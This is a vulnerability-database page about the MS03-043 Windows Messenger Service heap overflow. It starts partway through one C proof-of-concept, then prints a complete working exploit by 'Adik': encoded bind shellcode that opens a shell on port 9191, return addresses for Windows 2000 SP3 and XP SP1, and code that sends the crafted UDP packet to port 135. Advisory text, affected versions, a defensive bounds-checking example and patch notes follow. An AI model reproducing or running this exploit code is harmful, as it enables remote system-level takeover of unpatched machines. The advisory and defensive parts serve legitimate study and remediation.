   case 's': 
            strncpy(from,optarg,sizeof(from)); 
      break; 
  
   case 'h': 
      usage(argv[0]); 
      exit(0); 
      break; 
   } 
       
        // A few conditions : 
        // 0 <= strlen(from) + strlen(machine) <= 56 
        // max fields size 3992 
  
  if(!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n"); 
exit(0); } 
  
        if(!strlen(machine)) { printf("Ummmm we also need the dest netbios name bro...\n"); exit(0); }
  
  if(!strlen(from)) strcpy(from,"tolazytotype"); 
  
        memset(packet,0, sizeof(packet)); 
        packet_size = 0; 
  
        memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 
1); 
        packet_size += sizeof(packet_header) - 1; 
  
        i = strlen(from) + 1; 
        *(unsigned int *)(&field_header[0]) = i; 
        *(unsigned int *)(&field_header[8]) = i; 
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 
1); 
        packet_size += sizeof(field_header) - 1; 
        strcpy(&packet[packet_size], from); 
        packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4
  
        i = strlen(machine) + 1; 
        *(unsigned int *)(&field_header[0]) = i; 
        *(unsigned int *)(&field_header[8]) = i; 
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 
1); 
        packet_size += sizeof(field_header) - 1; 
        strcpy(&packet[packet_size], machine); 
        packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4
  
        fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 
3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); 
        memset(body, 0x14, sizeof(body)); 
        body[3992 - packet_size + sizeof(packet_header) - 
sizeof(field_header) - 1] = '\0'; 
  
        i = strlen(body) + 1; 
        *(unsigned int *)(&field_header[0]) = i; 
        *(unsigned int *)(&field_header[8]) = i; 
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 
1); 
        packet_size += sizeof(field_header) - 1; 
        strcpy(&packet[packet_size], body); 
        packet_size += i; 
  
        fields_size = packet_size - (sizeof(packet_header) - 1); 
        *(unsigned int *)(&packet[40]) = time(NULL); 
        *(unsigned int *)(&packet[74]) = fields_size; 
  
        fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size);
  


 if ((s = socket (AF_INET, SOCK_DGRAM, 0)) == -1 ) 
  { 
   perror("Error socket() - "); 
   exit(0); 
  } 
  
        if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, 
sizeof(addr)) == -1) 
  { 
   perror("Error sendto() - "); 
   exit(0); 
  } 
  


        exit(0); 
}

// milw0rm.com [2004-08-08]
		

- Vulnerability information (23247)

Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability (EDBID:23247)
windows remote
2003-10-25 Verified
0 Adik
N/A
source: http://www.securityfocus.com/bid/8826/info

Microsoft Windows Messenger Service is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of messages before they are passed to an internal buffer. Exploitation could result in a denial of service or in execution of malicious code in Local System context, potentially allowing for full system compromise. 

/************************************************************************************

 Exploit for Microsoft Windows Messenger Heap Overflow (MS03-043)
 based on PoC DoS by recca@mail.ru

	by Adik < netmaniac [at] hotmail.kg >
	http://netninja.to.kg

 Binds command shell on port 9191
 Tested on 
			Windows XP Professional SP1 English version
			Windows 2000 Professional SP3 English version 

 access violation -> unhandledexceptionfilter -> 
 -> call [esi+48h]/call [edi+6ch] (win2kSP3/WinXPSP1) -> longjmp -> shellcode

 
  attach debugger and c how it flows :)	worked fine for me


	-[25/Oct/2003]-
************************************************************************************/

#include <stdio.h>
#include <winsock.h>
#include <string.h>
#include <time.h>

#pragma comment(lib,"ws2_32")

#define VER		"0.7"	

/**************** bind shellcode spawns shell on port 9191 ************************/

unsigned char kyrgyz_bind_code[] = {
	0xEB,0x03,0x5D,0xEB,0x05,0xE8,0xF8,0xFF,0xFF,0xFF,0x8B,0xC5,0x83,0xC0,0x11,0x33,0xC9,0x66,0xB9,
	0xC9,0x01,0x80,0x30,0x88,0x40,0xE2,0xFA,
	0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 
	0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 
	0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 
	0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 
	0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 
	0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAB, 0x6F, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 
	0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 
	0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 
	0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 
	0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 
	0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 
	0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 
	0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 
	0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 
	0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 
	0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 
	0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 
	0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 
	0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 
	0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};



int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH);

int main(int argc,char *argv[])
{
        int sockUDP,ver,c, packetsz,cnt;
        unsigned char packet[8192];
        struct sockaddr_in targetUDP;        
		WSADATA wsaData;		
		
		struct
		{
			char os[30];
			DWORD SEH;
			DWORD JMP;
		} targetOS[] = 
		{
			{
				"Windows 2000 SP 3 (en)",
				0x77ee044c,		// unhandledexceptionfilter pointer
				0x768d693e		// cryptsvc.dll call [esi+48] 0x768d693e
			},
			{
				"Windows XP SP 1 (en)",
				0x77ed73b4,
				0x7804bf52	//rpcrt4.dll	call [edi+6c]
			}/*,
			{	//not tested
				"Windows XP SP 0 (en)",
				0x77ed63b4,
				0x7802ff3d	//rpcrt4 call [edi+6c]
			}*/
		};

		
		printf("\n-=[ MS Messenger Service Heap Overflow Exploit (MS03-043) ver %s ]=-\n\n"
				   " by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n", VER);

		if(argc < 3)
		{			
			printf(" Target OS version:\n\n");
			for(c=0;c<(sizeof(targetOS)/sizeof(targetOS[0]));c++)
				printf(" [%d]\t%s\n",c,targetOS[c].os);
			printf("\n Usage: %s [TargetIP] [ver: 0 | 1]\n"
					" eg: msgr.exe 192.168.63.130 0\n",argv[0]);
			return 1;
		}
		ver = atoi(argv[2]);
		printf("[*] Target: \t IP: %s\t OS: %s\n"
			   "[*] UEF: \t 0x%x\n"
			   "[*] JMP: \t 0x%x\n\n", argv[1],targetOS[ver].os, targetOS[ver].SEH, targetOS[ver].JMP);

        WSAStartup(0x0202, &wsaData);
		printf("[*] WSAStartup initialized...\n");

        ZeroMemory(&targetUDP, sizeof(targetUDP));
		
        targetUDP.sin_family = AF_INET;
        targetUDP.sin_addr.s_addr = inet_addr(argv[1]);
        targetUDP.sin_port = htons(135);

		packetsz = PreparePacket(packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH);

        if ((sockUDP = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
		{
				printf("[x] Socket not initialized! Exiting...\n");
                return 1;
		}
		printf("[*] Socket initialized...\n");
		printf("[*] Injecting packet into a remote process...\n");
		
		if (sendto(sockUDP, packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1)
		{
			printf("[x] Failed to inject packet! Exiting...\n");
            return 1;
		}
		else
			printf("[*] Packet injected...\n");
		
		printf("[i] Try connecting to %s:9191\n\n",argv[1]);
        return 0;
}



/************************************************************************************/
int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH)
{	
		static unsigned char packet_header[] =
		"\x04\x00\x28\x00"
		"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
		"\x4f\xb6\xe6\xfc\xff\xff\xff\xff\x42\x69\x73\x68\x6b\x65\x6b\x32"
		"\x30\x30\x33\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
		"\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00";

		unsigned char field_header[] = 	"\xff\xff\xff\xff\x00\x00\x00\x00"
										"\xff\xff\xff\xff";

		int packet_size,i,fields_size;		
		char from[] = "NETMANIAC";
        char machine[] = "ADIK";
		char longjmp[] ="\x90\x90\x90\x90\x90"
						"\xEB\x03\x58\xEB\x05\xE8\xF8\xFF\xFF\xFF"
						"\xB9\xFF\xFF\xFF\xFF\x81\xE9\x7F\xEE\xFF"
						"\xFF\x2B\xC1\xFF\xE0";		
		char shortjmp[] ="\x90\x90\x90\x90\xEB\x10\x90\x90\x90\x90\x90\x90";
        char body[5000] = "*** MESSAGE ***";//4096

		ZeroMemory(packet, sizeofpacket);
		packet_size = 0;

        memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
        packet_size += sizeof(packet_header) - 1;

        i = strlen(from) + 1;
        *(unsigned int *)(&field_header[0]) = i;
        *(unsigned int *)(&field_header[8]) = i;
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
        packet_size += sizeof(field_header) - 1;
        strcpy(&packet[packet_size], from);
        packet_size += (((i - 1) >> 2) + 1) << 2; 
        i = strlen(machine) + 1;
        *(unsigned int *)(&field_header[0]) = i;
        *(unsigned int *)(&field_header[8]) = i;
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
        packet_size += sizeof(field_header) - 1;
        strcpy(&packet[packet_size], machine);
        packet_size += (((i - 1) >> 2) + 1) << 2; 
		memset(body, 0x90, 2296); 
		memcpy(&body[500],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
		memset(&body[2296],0x14,1800); 		
		memcpy(&body[2296+1110],shortjmp,sizeof(shortjmp));
		*(DWORD *)&body[2296+1121] = Jmp;
		*(DWORD *)&body[2296+1125] = SEH;	
		memcpy(&body[2296+1129],longjmp,sizeof(longjmp)-1);
		fprintf(stdout, "[*] Msg body size: %d\n", 
						3656 - packet_size + sizeof(packet_header) - sizeof(field_header));
		
        body[3656 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';
		
        i = strlen(body) + 1;
		
        *(unsigned int *)(&field_header[0]) = i;
        *(unsigned int *)(&field_header[8]) = i;
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
        packet_size += sizeof(field_header) - 1;
        strcpy(&packet[packet_size], body);
        packet_size += i;

        fields_size = packet_size - (sizeof(packet_header) - 1);
        *(unsigned int *)(&packet[40]) = time(NULL);
        *(unsigned int *)(&packet[74]) = fields_size;

		return packet_size;

}
/************************************************************************************/



		

- Vulnerability Information

10936
Microsoft Windows Messenger Service Message Length Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability Description

A remote overflow exists in Microsoft Windows. The Messenger Service fails to perform proper bounds checking on the message length resulting in a buffer overflow. With a specially crafted message, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2003-10-15 2001-01-01
2003-11-16 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability Author

- Vulnerability Information

Microsoft Windows Messenger Service Buffer Overrun Vulnerability
Boundary Condition Error 8826
Yes No
2003-10-15 12:00:00 2009-07-11 11:56:00
Discovery is credited to The Last Stage of Delirium Research Group.

- Affected Program Versions

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server

- Vulnerability Discussion

Microsoft Windows Messenger Service is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of messages before they are passed to an internal buffer. Exploitation could result in a denial of service or in execution of malicious code in Local System context, potentially allowing for full system compromise.
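The bounds check this discussion describes as missing, shown as an added example that is not part of the original page or of the exploit above: it walks the from/machine/body fields in the layout the exploit's PreparePacket builds (12-byte header carrying the length twice, then the NUL-terminated string padded to 4 bytes) and rejects any field whose declared length exceeds the datagram or the destination buffer before a byte is copied. HDR, MAX_NAME_LEN, MAX_BODY_LEN, encode_field, parse_field and check_sample are names and limits assumed here, and the sample messages are constructed.

```c
#include <stdint.h>
#include <string.h>
/* Field layout from the packet builder above: 12-byte header (length incl. NUL, 4 zero
   bytes, length again), then the string padded to 4 bytes. MAX_* are assumed caps. */
#define HDR 12
#define MAX_NAME_LEN 16
#define MAX_BODY_LEN 1024
static uint32_t rd32(const unsigned char *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
/* Encode one field as PreparePacket does; used here only to build sample input. */
size_t encode_field(unsigned char *dst, const char *s)
{
    uint32_t len = (uint32_t)strlen(s) + 1, padded = (len + 3) & ~3u;
    memset(dst, 0, HDR + padded);
    for (int i = 0; i < 4; i++) dst[i] = dst[8 + i] = (unsigned char)(len >> (8 * i));
    memcpy(dst + HDR, s, len);
    return HDR + padded;
}
/* Parse one field at *off. The sender controls the length, so it is checked against the
   datagram and the destination buffer before any byte is copied: the bounds check the
   vulnerable service lacked. Returns 1 on success, 0 on rejection. */
int parse_field(const unsigned char *buf, size_t buflen, size_t *off, char *out, size_t outcap)
{
    if (buflen - *off < HDR) return 0;
    uint32_t len = rd32(buf + *off);
    size_t avail = buflen - *off - HDR, padded = ((size_t)len + 3) & ~(size_t)3;
    if (len == 0 || len != rd32(buf + *off + 8) || len > outcap || len > avail) return 0;
    if (buf[*off + HDR + len - 1] != '\0') return 0;   /* must terminate within its own length */
    memcpy(out, buf + *off + HDR, len);
    *off += HDR + (padded <= avail ? padded : avail);
    return 1;
}
/* Build a constructed from/machine/body message and validate all three fields. Variants:
   0 = well formed, 1 = 2000-byte body over MAX_BODY_LEN, 2 = first length forged to 4000.
   Returns 0 when every field passes, otherwise the 1-based index of the rejected field. */
int check_sample(int variant)
{
    static const size_t cap[3] = { MAX_NAME_LEN, MAX_NAME_LEN, MAX_BODY_LEN };
    static unsigned char msg[4096];
    static char big[2001], out[MAX_BODY_LEN];
    size_t n = 0, off = 0;
    memset(big, 'A', 2000);
    n += encode_field(msg + n, "NETMANIAC");
    n += encode_field(msg + n, "ADIK");
    n += encode_field(msg + n, variant == 1 ? big : "hello");
    if (variant == 2) { msg[0] = msg[8] = 0xA0; msg[1] = msg[9] = 0x0F; }
    for (int i = 0; i < 3; i++)
        if (!parse_field(msg, n, &off, out, cap[i])) return i + 1;
    return 0;
}
```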

- Exploitation

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A proof-of-concept exploit (MS03-04.W2kFR.c) has been released by MrNice and has been reported to be tested on French localized Microsoft Windows 2000 SP0 systems. A denial-of-service proof of concept has also been released, along with a Linux port (ms03-043.c) of it. The Linux port has been updated so that it compiles on FreeBSD.

- Solution

Microsoft has released updates to address this issue.

Microsoft has released updated version 1.1 of Microsoft security bulletin MS03-043 containing updated information for the security patch. Revision 2.0 of the bulletin was also released to provide updated patches for Windows 2000, Windows XP and Windows Server 2003 to address an unrelated problem with Debug Programs (SeDebugPrivilege). These patches can be found in the same location as the initial patches. Please see the updated bulletin for further details.

Updates are available for the following platforms:

Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows NT Server 4.0 SP6a
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows 2000 Professional SP2
Microsoft Windows Server 2003 Web Edition
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows XP Home SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows 2000 Server SP3
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows XP Professional SP1

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site].

Copyright Notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.